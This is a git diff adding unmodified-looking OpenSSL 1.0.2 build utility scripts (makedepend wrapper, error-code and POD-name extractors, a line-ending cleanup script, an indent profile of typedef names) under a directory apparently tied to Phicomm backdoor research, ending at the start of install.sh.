diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/domd b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/domd
new file mode 100755
index 0000000..bab48cb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/domd
@@ -0,0 +1,38 @@
+#!/bin/sh
+# Do a makedepend, only leave out the standard headers
+# Written by Ben Laurie <ben@algroup.co.uk> 19 Jan 1999
+
+TOP=$1
+shift
+if [ "$1" = "-MD" ]; then
+    shift
+    MAKEDEPEND=$1
+    shift
+fi
+if [ "$MAKEDEPEND" = "" ]; then MAKEDEPEND=makedepend; fi
+
+cp Makefile Makefile.save
+# fake the presence of Kerberos
+touch $TOP/krb5.h
+if expr "$MAKEDEPEND" : '.*gcc$' > /dev/null; then
+    args=""
+    while [ $# -gt 0 ]; do
+	if [ "$1" != "--" ]; then args="$args $1"; fi
+	shift
+    done
+    sed -e '/^# DO NOT DELETE.*/,$d' < Makefile > Makefile.tmp
+    echo '# DO NOT DELETE THIS LINE -- make depend depends on it.' >> Makefile.tmp
+    ${MAKEDEPEND} -Werror -D OPENSSL_DOING_MAKEDEPEND -M $args >> Makefile.tmp || exit 1
+    ${PERL} $TOP/util/clean-depend.pl < Makefile.tmp > Makefile.new
+    RC=$?
+    rm -f Makefile.tmp
+else
+    ${MAKEDEPEND} -D OPENSSL_DOING_MAKEDEPEND $@ && \
+    ${PERL} $TOP/util/clean-depend.pl < Makefile > Makefile.new
+    RC=$?
+fi
+mv Makefile.new Makefile
+# unfake the presence of Kerberos
+rm $TOP/krb5.h
+
+exit $RC
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/err-ins.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/err-ins.pl
new file mode 100755
index 0000000..31b70df
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/err-ins.pl
@@ -0,0 +1,33 @@
+#!/usr/local/bin/perl
+#
+# tack error codes onto the end of a file
+#
+
+open(ERR,$ARGV[0]) || die "unable to open error file '$ARGV[0]':$!\n";
+@err=<ERR>;
+close(ERR);
+
+open(IN,$ARGV[1]) || die "unable to open header file '$ARGV[1]':$!\n";
+
+@out="";
+while (<IN>)
+	{
+	push(@out,$_);
+	last if /BEGIN ERROR CODES/;
+	}
+close(IN);
+
+open(OUT,">$ARGV[1]") || die "unable to open header file '$ARGV[1]':$1\n";
+print OUT @out;
+print OUT @err;
+print OUT <<"EOF";
+ 
+#ifdef  __cplusplus
+}
+#endif
+#endif
+
+EOF
+close(OUT);
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/extract-names.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/extract-names.pl
new file mode 100644
index 0000000..35bd6ed
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/extract-names.pl
@@ -0,0 +1,26 @@
+#!/usr/bin/perl
+
+$/ = "";			# Eat a paragraph at once.
+while(<STDIN>) {
+    chop;
+    s/\n/ /gm;
+    if (/^=head1 /) {
+	$name = 0;
+    } elsif ($name) {
+	if (/ - /) {
+	    s/ - .*//;
+	    s/,\s+/,/g;
+	    s/\s+,/,/g;
+	    s/^\s+//g;
+	    s/\s+$//g;
+	    s/\s/_/g;
+	    push @words, split ',';
+	}
+    }
+    if (/^=head1 *NAME *$/) {
+	$name = 1;
+    }
+}
+
+print join("\n", @words),"\n";
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/extract-section.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/extract-section.pl
new file mode 100644
index 0000000..7a0ba4f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/extract-section.pl
@@ -0,0 +1,12 @@
+#!/usr/bin/perl
+
+while(<STDIN>) {
+	if (/=for\s+comment\s+openssl_manual_section:(\S+)/)
+		{
+		print "$1\n";
+		exit 0;
+		}
+}
+
+print "$ARGV[0]\n";
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/files.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/files.pl
new file mode 100755
index 0000000..b15407f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/files.pl
@@ -0,0 +1,67 @@
+#!/usr/local/bin/perl
+#
+# used to generate the file MINFO for use by util/mk1mf.pl
+# It is basically a list of all variables from the passed makefile
+#
+
+while ($ARGV[0] =~ /^(\S+)\s*=(.*)$/)
+	{
+	$sym{$1} = $2;
+	shift;
+	}
+
+$s="";
+while (<>)
+	{
+	chop;
+	s/#.*//;
+	if (/^(\S+)\s*=\s*(.*)$/)
+		{
+		$o="";
+		($s,$b)=($1,$2);
+		for (;;)
+			{
+			if ($b =~ /\\$/)
+				{
+				chop($b);
+				$o.=$b." ";
+				$b=<>;
+				chop($b);
+				}
+			else
+				{
+				$o.=$b." ";
+				last;
+				}
+			}
+		$o =~ s/^\s+//;
+		$o =~ s/\s+$//;
+		$o =~ s/\s+/ /g;
+
+		$o =~ s/\$[({]([^)}]+)[)}]/$sym{$1}/g;
+		$sym{$s}=$o if !exists $sym{$s};
+		}
+	}
+
+$pwd=`pwd`; chop($pwd);
+
+if ($sym{'TOP'} eq ".")
+	{
+	$n=0;
+	$dir=".";
+	}
+else	{
+	$n=split(/\//,$sym{'TOP'});
+	@_=split(/\//,$pwd);
+	$z=$#_-$n+1;
+	foreach $i ($z .. $#_) { $dir.=$_[$i]."/"; }
+	chop($dir);
+	}
+
+print "RELATIVE_DIRECTORY=$dir\n";
+
+foreach (sort keys %sym)
+	{
+	print "$_=$sym{$_}\n";
+	}
+print "RELATIVE_DIRECTORY=\n";
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/fixNT.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/fixNT.sh
new file mode 100755
index 0000000..ab9e766
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/fixNT.sh
@@ -0,0 +1,14 @@
+#!/bin/sh
+#
+# clean up the mess that NT makes of my source tree
+#
+
+if [ -f makefile -a ! -f Makefile ]; then
+	/bin/mv makefile Makefile
+fi
+chmod +x Configure util/*
+echo cleaning
+/bin/rm -f `find . -name '*.$$$' -print` 2>/dev/null >/dev/null
+echo 'removing those damn ^M'
+perl -pi -e 's/\015//' `find . -type 'f' -print |grep -v '.obj$' |grep -v '.der$' |grep -v '.gz'`
+make -f Makefile links
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/indent.pro b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/indent.pro
new file mode 100644
index 0000000..e871431
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/indent.pro
@@ -0,0 +1,751 @@
+-bap
+-bbo
+-br
+-brs
+-c33
+-cd33
+-ce
+-ci4
+-cli0
+-cp33
+-d0
+-di1
+-hnl
+-i4
+-il1
+-ip0
+-l78
+-lp
+-nbad
+-nbc
+-ncdb
+-ncs
+-nfc1
+-nfca
+-npcs
+-nprs
+-npsl
+-nsc
+-ppi1 
+-saf
+-sai
+-saw
+-sob
+-ss
+-ts0
+-T ACCESS_DESCRIPTION
+-T ADDED_OBJ
+-T AEP_BBOOL
+-T AEP_CHAR
+-T AEP_CHAR_PTR
+-T AEP_CONNECTION_ENTRY
+-T AEP_CONNECTION_HNDL
+-T AEP_CONNECTION_HNDL_PTR
+-T AEP_FLAGS
+-T AEP_RV
+-T AEP_TRANSACTION_ID
+-T AEP_TRANSACTION_ID_PTR
+-T AEP_U16
+-T AEP_U32
+-T AEP_U32_PTR
+-T AEP_U64_PTR
+-T AEP_U8
+-T AEP_U8_PTR
+-T AEP_VOID_PTR
+-T AEP_VOID_PTR_PTR
+-T AES_KEY
+-T APP_INFO
+-T ARGS
+-T ASIdOrRange
+-T ASIdOrRanges
+-T ASIdentifierChoice
+-T ASIdentifiers
+-T ASN1_ADB
+-T ASN1_ADB_TABLE
+-T ASN1_AUX
+-T ASN1_BIT_STRING
+-T ASN1_BMPSTRING
+-T ASN1_BOOLEAN
+-T ASN1_COMPAT_FUNCS
+-T ASN1_CTX
+-T ASN1_ENCODING
+-T ASN1_ENUMERATED
+-T ASN1_EXTERN_FUNCS
+-T ASN1_GENERALIZEDTIME
+-T ASN1_GENERALSTRING
+-T ASN1_IA5STRING
+-T ASN1_INTEGER
+-T ASN1_ITEM
+-T ASN1_ITEM_EXP
+-T ASN1_NULL
+-T ASN1_OBJECT
+-T ASN1_OCTET_STRING
+-T ASN1_PCTX
+-T ASN1_PRIMITIVE_FUNCS
+-T ASN1_PRINTABLESTRING
+-T ASN1_PRINT_ARG
+-T ASN1_SCTX
+-T ASN1_STREAM_ARG
+-T ASN1_STRING
+-T ASN1_STRING_TABLE
+-T ASN1_T61STRING
+-T ASN1_TEMPLATE
+-T ASN1_TIME
+-T ASN1_TLC
+-T ASN1_TYPE
+-T ASN1_UNIVERSALSTRING
+-T ASN1_UTCTIME
+-T ASN1_UTF8STRING
+-T ASN1_VALUE
+-T ASN1_VISIBLESTRING
+-T ASN1_const_CTX
+-T AUTHORITY_INFO_ACCESS
+-T AUTHORITY_KEYID
+-T BASIC_CONSTRAINTS
+-T BF_KEY
+-T BF_LONG
+-T BIGNUM
+-T BIO
+-T BIO_ACCEPT
+-T BIO_ASN1_BUF_CTX
+-T BIO_ASN1_EX_FUNCS
+-T BIO_B64_CTX
+-T BIO_CONNECT
+-T BIO_ENC_CTX
+-T BIO_F_BUFFER_CTX
+-T BIO_LINEBUFFER_CTX
+-T BIO_METHOD
+-T BIO_OK_CTX
+-T BIO_SSL
+-T BIT_STRING_BITNAME
+-T BN_BLINDING
+-T BN_CTX
+-T BN_GENCB
+-T BN_MONT_CTX
+-T BN_POOL
+-T BN_POOL_ITEM
+-T BN_RECP_CTX
+-T BN_STACK
+-T BN_ULONG
+-T BUF_MEM
+-T BY_DIR
+-T BY_DIR_ENTRY
+-T BY_DIR_HASH
+-T Bytef
+-T CAMELLIA_KEY
+-T CAST_KEY
+-T CAST_LONG
+-T CA_DB
+-T CCM128_CONTEXT
+-T CERT
+-T CERTIFICATEPOLICIES
+-T CERT_PKEY
+-T CIPHER_ORDER
+-T CMAC_CTX
+-T CMS_AuthenticatedData
+-T CMS_CertificateChoices
+-T CMS_CompressedData
+-T CMS_ContentInfo
+-T CMS_DigestedData
+-T CMS_EncapsulatedContentInfo
+-T CMS_EncryptedContentInfo
+-T CMS_EncryptedData
+-T CMS_EnvelopedData
+-T CMS_IssuerAndSerialNumber
+-T CMS_KEKIdentifier
+-T CMS_KEKRecipientInfo
+-T CMS_KeyAgreeRecipientIdentifier
+-T CMS_KeyAgreeRecipientInfo
+-T CMS_KeyTransRecipientInfo
+-T CMS_OriginatorIdentifierOrKey
+-T CMS_OriginatorInfo
+-T CMS_OriginatorPublicKey
+-T CMS_OtherCertificateFormat
+-T CMS_OtherKeyAttribute
+-T CMS_OtherRecipientInfo
+-T CMS_OtherRevocationInfoFormat
+-T CMS_PasswordRecipientInfo
+-T CMS_Receipt
+-T CMS_ReceiptRequest
+-T CMS_ReceiptsFrom
+-T CMS_RecipientEncryptedKey
+-T CMS_RecipientIdentifier
+-T CMS_RecipientInfo
+-T CMS_RecipientKeyIdentifier
+-T CMS_RevocationInfoChoice
+-T CMS_SignedData
+-T CMS_SignerIdentifier
+-T CMS_SignerInfo
+-T COMP_CTX
+-T COMP_METHOD
+-T CONF
+-T CONF_IMODULE
+-T CONF_METHOD
+-T CONF_MODULE
+-T CONF_VALUE
+-T CRYPTO_EX_DATA
+-T CRYPTO_EX_DATA_FUNCS
+-T CRYPTO_EX_DATA_IMPL
+-T CRYPTO_EX_dup
+-T CRYPTO_EX_dup
+-T CRYPTO_EX_free
+-T CRYPTO_EX_free
+-T CRYPTO_EX_new
+-T CRYPTO_EX_new
+-T CRYPTO_MEM_LEAK_CB
+-T CRYPTO_THREADID
+-T CRYPTO_dynlock_value
+-T DB_ATTR
+-T DES_LONG
+-T DES_cblock
+-T DES_key_schedule
+-T DH
+-T DH_METHOD
+-T DH_PKEY_CTX
+-T DIST_POINT
+-T DIST_POINT_NAME
+-T DRBG_CTX
+-T DSA
+-T DSA_METHOD
+-T DSA_SIG
+-T DSO
+-T DSO_FUNC_TYPE
+-T DSO_MERGER_FUNC
+-T DSO_METHOD
+-T DSO_NAME_CONVERTER_FUNC
+-T DSO_VMS_INTERNAL
+-T DTLS1_BITMAP
+-T DTLS1_RECORD_DATA
+-T DTLS1_STATE
+-T Dl_info
+-T ECDH_DATA
+-T ECDH_METHOD
+-T ECDSA_DATA
+-T ECDSA_METHOD
+-T ECDSA_SIG
+-T ECPARAMETERS
+-T ECPKPARAMETERS
+-T EC_EXTRA_DATA
+-T EC_GROUP
+-T EC_KEY
+-T EC_METHOD
+-T EC_POINT
+-T EC_PRE_COMP
+-T EC_PRIVATEKEY
+-T EC_builtin_curve
+-T EDIPARTYNAME
+-T ENGINE
+-T ENGINE_CIPHERS_PTR
+-T ENGINE_CLEANUP_CB
+-T ENGINE_CLEANUP_ITEM
+-T ENGINE_CMD_DEFN
+-T ENGINE_CTRL_FUNC_PTR
+-T ENGINE_DIGESTS_PTR
+-T ENGINE_GEN_FUNC_PTR
+-T ENGINE_GEN_INT_FUNC_PTR
+-T ENGINE_LOAD_KEY_PTR
+-T ENGINE_PILE
+-T ENGINE_PILE_DOALL
+-T ENGINE_PKEY_ASN1_METHS_PTR
+-T ENGINE_PKEY_METHS_PTR
+-T ENGINE_SSL_CLIENT_CERT_PTR
+-T ENGINE_TABLE
+-T ENUMERATED_NAMES
+-T ERR_FNS
+-T ERR_STATE
+-T ERR_STRING_DATA
+-T ESS_CERT_ID
+-T ESS_ISSUER_SERIAL
+-T ESS_SIGNING_CERT
+-T EVP_AES_HMAC_SHA1
+-T EVP_AES_HMAC_SHA256
+-T EVP_CIPHER
+-T EVP_CIPHER_CTX
+-T EVP_CIPHER_INFO
+-T EVP_ENCODE_CTX
+-T EVP_MD
+-T EVP_MD_CTX
+-T EVP_PBE_CTL
+-T EVP_PBE_KEYGEN
+-T EVP_PKEY
+-T EVP_PKEY_ASN1_METHOD
+-T EVP_PKEY_CTX
+-T EVP_PKEY_METHOD
+-T EVP_PKEY_gen_cb
+-T EX_CLASS_ITEM
+-T E_GMP_RSA_CTX
+-T E_RSAX_MOD_CTX
+-T FILE
+-T F_DIGITALSIGNATUREVERIFY
+-T F_PUBLICKEYEXTRACT
+-T GCM128_CONTEXT
+-T GENERAL_NAME
+-T GENERAL_NAMES
+-T GENERAL_SUBTREE
+-T GEN_SESSION_CB
+-T HASH_CTX
+-T HEAPENTRY32
+-T HEAPLIST32
+-T HEARTBEAT_TEST_FIXTURE
+-T HMAC_CTX
+-T ICA_KEY_RSA_CRT
+-T ICA_KEY_RSA_CRT_REC
+-T ICA_KEY_RSA_MODEXPO
+-T ICA_KEY_RSA_MODEXPO_REC
+-T IDEA_KEY_SCHEDULE
+-T IPAddrBlocks
+-T IPAddressFamily
+-T IPAddressOrRange
+-T IPAddressOrRanges
+-T ISSUING_DIST_POINT
+-T JPAKE_CTX
+-T JPAKE_STEP1
+-T JPAKE_STEP2
+-T JPAKE_STEP3A
+-T JPAKE_STEP3B
+-T JPAKE_STEP_PART
+-T JPAKE_ZKP
+-T KEY_TABLE_TYPE
+-T KRB5_APREQBODY
+-T KRB5_AUTHDATA
+-T KRB5_AUTHENTBODY
+-T KRB5_CHECKSUM
+-T KRB5_ENCDATA
+-T KRB5_ENCKEY
+-T KRB5_PRINCNAME
+-T KRB5_TKTBODY
+-T KSSL_CTX
+-T KSSL_ERR
+-T LHASH
+-T LHASH_COMP_FN_TYPE
+-T LHASH_DOALL_ARG_FN_TYPE
+-T LHASH_DOALL_FN_TYPE
+-T LHASH_HASH_FN_TYPE
+-T LHASH_NODE
+-T LPDIR_CTX
+-T LPHEAPENTRY32
+-T LPHEAPLIST32
+-T LPMODULEENTRY32
+-T LPMODULEENTRY32W
+-T LPPROCESSENTRY32
+-T LPPROCESSENTRY32W
+-T LPTHREADENTRY32
+-T LP_DIR_CTX
+-T MD2_CTX
+-T MD4_CTX
+-T MD5_CTX
+-T MDC2_CTX
+-T MD_DATA
+-T MEM
+-T MEM_LEAK
+-T MEM_OBJECT_DATA
+-T MIME_HEADER
+-T MIME_PARAM
+-T MODULEENTRY32
+-T MODULEENTRY32W
+-T MS_FAR
+-T NAME_CONSTRAINTS
+-T NAME_FUNCS
+-T NBIO_TEST
+-T NDEF_SUPPORT
+-T NETSCAPE_CERT_SEQUENCE
+-T NETSCAPE_ENCRYPTED_PKEY
+-T NETSCAPE_PKEY
+-T NETSCAPE_SPKAC
+-T NETSCAPE_SPKI
+-T NETSCAPE_X509
+-T NET_API_FUNCTION
+-T NOTICEREF
+-T OBJ_NAME
+-T OCB128_CONTEXT
+-T OCB_BLOCK
+-T OCSP_BASICRESP
+-T OCSP_CERTID
+-T OCSP_CERTSTATUS
+-T OCSP_CRLID
+-T OCSP_ONEREQ
+-T OCSP_REQINFO
+-T OCSP_REQUEST
+-T OCSP_REQ_CTX
+-T OCSP_RESPBYTES
+-T OCSP_RESPDATA
+-T OCSP_RESPID
+-T OCSP_RESPONSE
+-T OCSP_REVOKEDINFO
+-T OCSP_SERVICELOC
+-T OCSP_SIGNATURE
+-T OCSP_SINGLERESP
+-T OCSP_TBLSTR
+-T OPENSSL_BLOCK
+-T OPENSSL_CSTRING
+-T OPENSSL_DIR_CTX
+-T OPENSSL_ITEM
+-T OPENSSL_PSTRING
+-T OPENSSL_STRING
+-T OPENSSL_STRING
+-T OTHERNAME
+-T P256_POINT
+-T P256_POINT_AFFINE
+-T PBE2PARAM
+-T PBEPARAM
+-T PBKDF2PARAM
+-T PCRYPTO_MEM_LEAK_CB
+-T PEM_CTX
+-T PEM_ENCODE_SEAL_CTX
+-T PEM_USER
+-T PHEAPENTRY32
+-T PHEAPLIST32
+-T PKCS12
+-T PKCS12_BAGS
+-T PKCS12_SAFEBAG
+-T PKCS7
+-T PKCS7_DIGEST
+-T PKCS7_ENCRYPT
+-T PKCS7_ENC_CONTENT
+-T PKCS7_ENVELOPE
+-T PKCS7_ISSUER_AND_SERIAL
+-T PKCS7_RECIP_INFO
+-T PKCS7_SIGNED
+-T PKCS7_SIGNER_INFO
+-T PKCS7_SIGN_ENVELOPE
+-T PKCS8_PRIV_KEY_INFO
+-T PKEY_USAGE_PERIOD
+-T PMODULEENTRY32
+-T PMODULEENTRY32W
+-T POLICYINFO
+-T POLICYQUALINFO
+-T POLICY_CONSTRAINTS
+-T POLICY_MAPPING
+-T POLICY_MAPPINGS
+-T PPROCESSENTRY32
+-T PPROCESSENTRY32W
+-T PRECOMP256_ROW
+-T PROCESSENTRY32
+-T PROCESSENTRY32W
+-T PROXY_CERT_INFO_EXTENSION
+-T PROXY_POLICY
+-T PTHREADENTRY32
+-T PW_CB_DATA
+-T RAND_METHOD
+-T RC2_KEY
+-T RC4_KEY
+-T RC5_32_KEY
+-T RIPEMD160_CTX
+-T RSA
+-T RSA_METHOD
+-T RSA_OAEP_PARAMS
+-T RSA_PKEY_CTX
+-T RSA_PSS_PARAMS
+-T SCT
+-T SEED_KEY_SCHEDULE
+-T SESS_CERT
+-T SHA256_CTX
+-T SHA512_CTX
+-T SHA_CTX
+-T SRP_ARG
+-T SRP_CLIENT_ARG
+-T SRP_CTX
+-T SRP_SERVER_ARG
+-T SRP_VBASE
+-T SRP_gN_cache
+-T SRP_user_pwd
+-T SRTP_PROTECTION_PROFILE
+-T SSL
+-T SSL2_STATE
+-T SSL3_BUFFER
+-T SSL3_BUF_FREELIST
+-T SSL3_BUF_FREELIST_ENTRY
+-T SSL3_COMP
+-T SSL3_ENC_METHOD
+-T SSL3_RECORD
+-T SSL3_STATE
+-T SSL_CIPHER
+-T SSL_COMP
+-T SSL_CONF_CTX
+-T SSL_CTX
+-T SSL_EXCERT
+-T SSL_METHOD
+-T SSL_SESSION
+-T SSL_SESSION_ASN1
+-T STACK_OF
+-T STORE
+-T STORE_ATTR_INFO
+-T STORE_ATTR_TYPES
+-T STORE_CERTIFICATE_STATUS
+-T STORE_CLEANUP_FUNC_PTR
+-T STORE_CTRL_FUNC_PTR
+-T STORE_END_OBJECT_FUNC_PTR
+-T STORE_GENERATE_OBJECT_FUNC_PTR
+-T STORE_GENERIC_FUNC_PTR
+-T STORE_GET_OBJECT_FUNC_PTR
+-T STORE_HANDLE_OBJECT_FUNC_PTR
+-T STORE_INITIALISE_FUNC_PTR
+-T STORE_METHOD
+-T STORE_MODIFY_OBJECT_FUNC_PTR
+-T STORE_NEXT_OBJECT_FUNC_PTR
+-T STORE_OBJECT
+-T STORE_OBJECT_TYPES
+-T STORE_PARAM_TYPES
+-T STORE_START_OBJECT_FUNC_PTR
+-T STORE_STORE_OBJECT_FUNC_PTR
+-T SW_ALGTYPE
+-T SW_BYTE
+-T SW_COMMAND_BITMAP
+-T SW_COMMAND_CODE
+-T SW_CONTEXT_HANDLE
+-T SW_CRT
+-T SW_DSA
+-T SW_EXP
+-T SW_LARGENUMBER
+-T SW_NVDATA
+-T SW_OSHANDLE
+-T SW_PARAM
+-T SW_STATE
+-T SW_STATUS
+-T SW_U16
+-T SW_U32
+-T SW_U64
+-T SXNET
+-T SXNETID
+-T TCHAR
+-T TEST_INFO
+-T THREADENTRY32
+-T TIMEOUT_PARAM
+-T TLS_SESSION_TICKET_EXT
+-T TLS_SIGALGS
+-T TS_ACCURACY
+-T TS_MSG_IMPRINT
+-T TS_REQ
+-T TS_RESP
+-T TS_RESP_CTX
+-T TS_STATUS_INFO
+-T TS_TST_INFO
+-T TS_VERIFY_CTX
+-T TXT_DB
+-T UI
+-T UINT64
+-T UI_METHOD
+-T UI_STRING
+-T USERNOTICE
+-T WCHAR
+-T WHIRLPOOL_CTX
+-T WINAPI
+-T WSAAPI
+-T X509
+-T X509V3_CONF_METHOD
+-T X509V3_CTX
+-T X509V3_EXT_D2I
+-T X509V3_EXT_FREE
+-T X509V3_EXT_I2D
+-T X509V3_EXT_I2R
+-T X509V3_EXT_I2S
+-T X509V3_EXT_METHOD
+-T X509V3_EXT_NEW
+-T X509V3_EXT_R2I
+-T X509V3_EXT_S2I
+-T X509V3_EXT_V2I
+-T X509_ALGOR
+-T X509_ATTRIBUTE
+-T X509_CERT_AUX
+-T X509_CERT_FILE_CTX
+-T X509_CERT_PAIR
+-T X509_CINF
+-T X509_CRL
+-T X509_CRL_INFO
+-T X509_CRL_METHOD
+-T X509_EXTENSION
+-T X509_INFO
+-T X509_LOOKUP
+-T X509_LOOKUP_METHOD
+-T X509_NAME
+-T X509_NAME_ENTRY
+-T X509_OBJECT
+-T X509_OBJECTS
+-T X509_PKEY
+-T X509_POLICY_CACHE
+-T X509_POLICY_DATA
+-T X509_POLICY_LEVEL
+-T X509_POLICY_NODE
+-T X509_POLICY_TREE
+-T X509_PUBKEY
+-T X509_PURPOSE
+-T X509_REQ
+-T X509_REQ_INFO
+-T X509_REVOKED
+-T X509_SIG
+-T X509_STORE
+-T X509_STORE_CTX
+-T X509_TRUST
+-T X509_VAL
+-T X509_VERIFY_PARAM
+-T X509_VERIFY_PARAM_ID
+-T X9_62_CHARACTERISTIC_TWO
+-T X9_62_CURVE
+-T X9_62_FIELDID
+-T X9_62_PENTANOMIAL
+-T XTS128_CONTEXT
+-T ZEN_MD_DATA
+-T _LHASH
+-T _STACK
+-T __int64
+-T _ossl_old_des_cblock
+-T asn1_ps_func
+-T bio_dgram_data
+-T bio_info_cb
+-T char_io
+-T conf_finish_func
+-T conf_init_func
+-T const_DES_cblock
+-T d2i_of_void
+-T des_cblock
+-T dynamic_data_ctx
+-T dynamic_fns
+-T engine_table_doall_cb
+-T i2d_of_void
+-T int_dhx942_dh
+-T nid_triple
+-T pem_password_cb
+-T pitem
+-T piterator
+-T pqueue_s
+-T session_op
+-T size_t
+-T tag_exp_arg
+-T testdata
+-T time_t
+-T time_t
+-T u32
+-T u64
+-T u8
+-T v3_ext_ctx
+-T v3_ext_method
+-T STACK_OF_ACCESS_DESCRIPTION_
+-T STACK_OF_ASIdOrRange_
+-T STACK_OF_ASN1_ADB_TABLE_
+-T STACK_OF_ASN1_INTEGER_
+-T STACK_OF_ASN1_OBJECT_
+-T STACK_OF_ASN1_STRING_TABLE_
+-T STACK_OF_ASN1_TYPE_
+-T STACK_OF_ASN1_UTF8STRING_
+-T STACK_OF_ASN1_VALUE_
+-T STACK_OF_BIO_
+-T STACK_OF_BY_DIR_ENTRY_
+-T STACK_OF_BY_DIR_HASH_
+-T STACK_OF_CMS_CertificateChoices_
+-T STACK_OF_CMS_RecipientEncryptedKey_
+-T STACK_OF_CMS_RecipientInfo_
+-T STACK_OF_CMS_RevocationInfoChoice_
+-T STACK_OF_CMS_SignerInfo_
+-T STACK_OF_CONF_IMODULE_
+-T STACK_OF_CONF_MODULE_
+-T STACK_OF_CONF_VALUE_
+-T STACK_OF_CRYPTO_EX_DATA_FUNCS_
+-T STACK_OF_CRYPTO_dynlock_
+-T STACK_OF_DIST_POINT_
+-T STACK_OF_ENGINE_
+-T STACK_OF_ENGINE_CLEANUP_ITEM_
+-T STACK_OF_ESS_CERT_ID_
+-T STACK_OF_EVP_PBE_CTL_
+-T STACK_OF_EVP_PKEY_ASN1_METHOD_
+-T STACK_OF_EVP_PKEY_METHOD_
+-T STACK_OF_GENERAL_NAMES_
+-T STACK_OF_GENERAL_NAME_
+-T STACK_OF_GENERAL_SUBTREE_
+-T STACK_OF_IPAddressFamily_
+-T STACK_OF_IPAddressOrRange_
+-T STACK_OF_KRB5_APREQBODY_
+-T STACK_OF_KRB5_AUTHENTBODY_
+-T STACK_OF_KRB5_TKTBODY_
+-T STACK_OF_MEM_OBJECT_DATA_
+-T STACK_OF_MIME_HEADER_
+-T STACK_OF_MIME_PARAM_
+-T STACK_OF_NAME_FUNCS_
+-T STACK_OF_OCSP_CERTID_
+-T STACK_OF_OCSP_ONEREQ_
+-T STACK_OF_OCSP_RESPID_
+-T STACK_OF_OCSP_SINGLERESP_
+-T STACK_OF_OPENSSL_BLOCK_
+-T STACK_OF_OPENSSL_PSTRING_
+-T STACK_OF_OPENSSL_STRING_
+-T STACK_OF_PKCS12_SAFEBAG_
+-T STACK_OF_PKCS7_
+-T STACK_OF_PKCS7_RECIP_INFO_
+-T STACK_OF_PKCS7_SIGNER_INFO_
+-T STACK_OF_POLICYINFO_
+-T STACK_OF_POLICYQUALINFO_
+-T STACK_OF_POLICY_MAPPING_
+-T STACK_OF_Request_
+-T STACK_OF_SCT_
+-T STACK_OF_SRP_gN_
+-T STACK_OF_SRP_gN_cache_
+-T STACK_OF_SRP_user_pwd_
+-T STACK_OF_SRTP_PROTECTION_PROFILE_
+-T STACK_OF_SSL_CIPHER_
+-T STACK_OF_SSL_COMP_
+-T STACK_OF_STORE_ATTR_INFO_
+-T STACK_OF_STRING_
+-T STACK_OF_SXNETID_
+-T STACK_OF_SingleResponse_
+-T STACK_OF_UI_STRING_
+-T STACK_OF_X509V3_EXT_METHOD_
+-T STACK_OF_X509_
+-T STACK_OF_X509_ALGOR_
+-T STACK_OF_X509_ATTRIBUTE_
+-T STACK_OF_X509_CRL_
+-T STACK_OF_X509_EXTENSION_
+-T STACK_OF_X509_INFO_
+-T STACK_OF_X509_LOOKUP_
+-T STACK_OF_X509_NAME_
+-T STACK_OF_X509_NAME_ENTRY_
+-T STACK_OF_X509_OBJECT_
+-T STACK_OF_X509_POLICY_DATA_
+-T STACK_OF_X509_POLICY_NODE_
+-T STACK_OF_X509_PURPOSE_
+-T STACK_OF_X509_REVOKED_
+-T STACK_OF_X509_TRUST_
+-T STACK_OF_X509_VERIFY_PARAM_
+-T STACK_OF_nid_triple_
+-T STACK_OF_void_
+-T LHASH_OF_ADDED_OBJ_
+-T LHASH_OF_APP_INFO_
+-T LHASH_OF_CONF_VALUE_
+-T LHASH_OF_ENGINE_PILE_
+-T LHASH_OF_ERR_STATE_
+-T LHASH_OF_ERR_STRING_DATA_
+-T LHASH_OF_EX_CLASS_ITEM_
+-T LHASH_OF_FUNCTION_
+-T LHASH_OF_MEM_
+-T LHASH_OF_OBJ_NAME_
+-T LHASH_OF_OPENSSL_STRING_
+-T LHASH_OF_SSL_SESSION_
+-T LHASH_OF_STRING_
+-T clock_t
+-T custom_ext_methods
+-T hm_fragment
+-T krb5_auth_context
+-T krb5_authdata
+-T KRB5_CALLCONV
+-T krb5_ccache
+-T krb5_context
+-T krb5_creds
+-T krb5_data
+-T krb5_deltat
+-T krb5_flags
+-T krb5_int32
+-T krb5_keyblock
+-T krb5_keytab
+-T krb5_keytab_entry
+-T krb5_octet
+-T krb5_principal
+-T krb5_principal_data
+-T krb5_rcache
+-T krb5_ticket
+-T krb5_ticket_times
+-T krb5_timestamp
+-T record_pqueue
+-T ssl_ctx_st
+-T ssl_flag_tbl
+-T ssl_st
+-T ssl_trace_tbl
+-T _stdcall
+-T tls12_lookup
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/install.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/install.sh
new file mode 100755
index 0000000..e1d0c98
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/install.sh
@@ -0,0 +1,108 @@
+#!/bin/sh
+#
